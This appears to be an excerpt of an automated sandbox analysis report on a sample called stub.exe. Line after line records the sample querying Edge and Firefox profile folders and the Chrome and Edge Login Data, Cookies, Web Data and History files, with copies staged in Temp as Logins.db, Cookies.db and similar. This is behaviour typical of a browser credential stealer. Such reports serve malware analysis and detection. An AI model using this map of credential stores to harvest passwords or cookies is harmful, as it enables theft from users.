                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\EADPData Component VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\EADPData Component\4.0.2.33 VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Designer VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Designer\1.0.0.20 VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Fre VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Travel VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Travel\1.0.0.2 VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19 VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\bnpl VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\ar VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\de VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\en-GB VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\fr-CA VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\ja VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\pt-BR VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\pt-PT VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\zh-Hans VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\ar VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\de VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\id VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\it VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\pt-BR VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification\es VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-notification-shared\ar VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-shared-components\ar VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\ar VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\de VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\es VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\fr VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\fr-CA VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\pt-PT VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\zh-Hans VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-tokenized-card\zh-Hant VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\wallet\wallet-checkout VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Mini-Wallet VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Notification VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Wallet-Checkout VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\FirstPartySetsPreloaded VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\FirstPartySetsPreloaded\2023.9.25.0 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\FirstPartySetsPreloaded\2023.9.25.0\_metadata VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Safe Browsing VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SafetyTips VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\TrustTokenKeyCommitments\2023.9.4.1\_metadata VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Typosquatting VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Typosquatting\1.20231005.1.0 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Typosquatting\1.20231006.1.0 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Web Notifications Deny List VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\WidevineCdm VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\WorkspacesNavigationComponent VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\WorkspacesNavigationComponent\1.0.0.5 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\bookmarkbackups VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\crashes VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\crashes\events VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\2023-10 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\db VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\events VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\saved-telemetry-pings VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\security_state VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2918063365piupsah.files VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\to-be-removed VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kz8kl7vh.default VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Logins.db VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Logins.db VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Web.db VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Web.db VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Cookies.db VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Cookies.db VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\HistoryData.db VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\HistoryData.db VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\DownloadData.db VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\DownloadData.db VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\AutofillData.db VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\AutofillData.db VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Queries volume information: \Device\CdRom0\ VolumeInformation
